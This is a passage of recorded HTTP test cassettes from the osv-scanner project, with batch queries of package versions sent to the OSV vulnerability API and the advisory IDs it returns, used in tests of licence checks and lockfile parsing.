"2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", "modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": "2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { "id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": "2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": "2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": "GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": "2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", "modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": "2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { "id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": "2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": "2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": "GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Licenses.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_in_summary_mode_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_with_expressions url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_with_invalid_expression_in_config url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_with_license_summary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 648 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_ignored_licenses url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {}, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_license_violations_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_license_summary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LocalDatabases.yaml ================================================ --- version: 2 interactions: [] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LocalDatabases_AlwaysOffline.yaml ================================================ --- version: 2 interactions: [] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LockfileWithExplicitParseAs.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/empty_is_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 882 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 271 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "271" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 882 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 271 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "271" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3 host: api.osv.dev body: | {} headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2 body: | {} headers: Content-Length: - "2" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 760 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": 